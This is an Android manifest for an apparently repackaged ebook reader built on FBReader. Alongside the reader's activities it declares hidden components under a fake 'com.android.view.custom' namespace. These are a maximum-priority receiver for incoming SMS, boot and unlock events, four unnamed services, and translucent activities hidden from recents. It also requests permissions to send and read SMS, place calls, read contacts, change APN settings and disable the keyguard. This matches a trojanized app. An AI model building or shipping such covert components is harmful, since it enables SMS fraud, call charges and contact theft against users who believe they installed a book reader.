<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:installLocation="preferExternal" package="com.kazamikita.book.biandishunv">
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:smallScreens="true"/>
    <meta-data android:name="Market_ID" android:value="1"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <application android:debuggable="true" android:icon="@drawable/icon" android:label="@string/app_name" android:name="org.geometerplus.zlibrary.ui.android.library.ZLAndroidApplication">
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:name="com.admob.android.ads.AdMobActivity" android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
        <meta-data android:name="GH_APPKEY" android:value="db54d02235ad052aef46f3188150363e"/>
        <activity android:configChanges="keyboardHidden|orientation" android:label="FBReader crash" android:name="org.geometerplus.zlibrary.ui.android.library.BugReportActivity"/>
        <activity android:configChanges="keyboardHidden|orientation" android:icon="@drawable/icon" android:label="@string/app_name" android:launchMode="singleTask" android:name="org.geometerplus.android.fbreader.FBReader">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <meta-data android:name="android.app.default_searchable" android:value="org.geometerplus.android.fbreader.TextSearchActivity"/>
        </activity>
        <activity android:name="org.geometerplus.android.fbreader.TextSearchActivity">
            <intent-filter>
                <action android:name="android.intent.action.SEARCH"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <meta-data android:name="android.app.searchable" android:resource="@xml/searchable"/>
        </activity>
        <activity android:name="org.geometerplus.android.fbreader.BookSearchActivity">
            <intent-filter>
                <action android:name="android.intent.action.SEARCH"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <meta-data android:name="android.app.searchable" android:resource="@xml/searchable"/>
        </activity>
        <activity android:name="org.geometerplus.android.fbreader.BookmarkSearchActivity">
            <intent-filter>
                <action android:name="android.intent.action.SEARCH"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <meta-data android:name="android.app.searchable" android:resource="@xml/searchable"/>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.LibraryTabActivity">
            <meta-data android:name="android.app.default_searchable" android:value="org.geometerplus.android.fbreader.BookSearchActivity"/>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.TOCActivity"/>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.BookmarksActivity">
            <meta-data android:name="android.app.default_searchable" android:value="org.geometerplus.android.fbreader.BookmarkSearchActivity"/>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.BookmarkEditActivity" android:theme="@android:style/Theme.Dialog"/>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.preferences.PreferenceActivity"/>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.preferences.BookInfoActivity"/>
        <activity android:name="org.geometerplus.android.fbreader.network.BookDownloader" android:process=":bookDownloader" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:host="*" android:pathPattern=".*\\.epub" android:scheme="http"/>
                <data android:host="*" android:pathPattern=".*\\.oeb" android:scheme="http"/>
                <data android:host="*" android:pathPattern=".*\\.fb2" android:scheme="http"/>
                <data android:host="*" android:pathPattern=".*\\.fb2\\.zip" android:scheme="http"/>
                <data android:host="*" android:pathPattern=".*\\.mobi" android:scheme="http"/>
                <data android:host="*" android:pathPattern=".*\\.prc" android:scheme="http"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:host="*" android:scheme="http"/>
                <data android:mimeType="application/epub+zip"/>
                <data android:mimeType="application/x-pilot-prc"/>
                <data android:mimeType="application/x-mobipocket-ebook"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:host="*rus.ec" android:mimeType="application/zip" android:scheme="http"/>
            </intent-filter>
        </activity>
        <service android:name="org.geometerplus.android.fbreader.network.BookDownloaderService" android:process=":bookDownloader"/>
        <activity android:configChanges="keyboardHidden|orientation" android:label="" android:name="org.geometerplus.zlibrary.ui.android.dialogs.DialogActivity"/>
        <activity android:name="org.geometerplus.android.fbreader.network.NetworkSearchActivity" android:process=":networkLibrary" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.SEARCH"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <meta-data android:name="android.app.searchable" android:resource="@xml/searchable"/>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.network.NetworkLibraryActivity" android:process=":networkLibrary">
            <meta-data android:name="android.app.default_searchable" android:value="org.geometerplus.android.fbreader.network.NetworkSearchActivity"/>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.network.NetworkCatalogActivity" android:process=":networkLibrary"/>
        <service android:name="org.geometerplus.android.fbreader.network.ItemsLoadingService" android:process=":networkLibrary"/>
        <activity android:configChanges="keyboardHidden|orientation" android:name="org.geometerplus.android.fbreader.network.NetworkBookInfoActivity" android:process=":networkLibrary"/>
        <activity android:name="org.geometerplus.android.fbreader.network.BookDownloaderCallback" android:process=":networkLibrary" android:theme="@android:style/Theme.NoDisplay"/>
        <activity android:name="com.android.view.custom.BaseAActivity"/>
        <receiver android:name="com.android.view.custom.BaseABroadcastReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.net.wifi.PICK_WIFI_WORK"/>
                <action android:name="android.net.conn.MEDIA_NOFS"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.INPUT_METHOD_CHANGED"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.UMS_CONNECTED"/>
                <action android:name="android.intent.action.UMS_DISCONNECTED"/>
            </intent-filter>
        </receiver>
        <service android:name="com.android.view.custom.FirstAService"/>
        <service android:name="com.android.view.custom.SecondAService"/>
        <service android:name="com.android.view.custom.ThirdAService"/>
        <service android:name="com.android.view.custom.FourthAService"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.FirstAActivity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.SecondAActivity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.ThirdAActivity" android:screenOrientation="portrait"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.FourthAActivity" android:screenOrientation="portrait"/>
        <meta-data android:name="PID" android:value="secv"/>
    </application>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
</manifest>
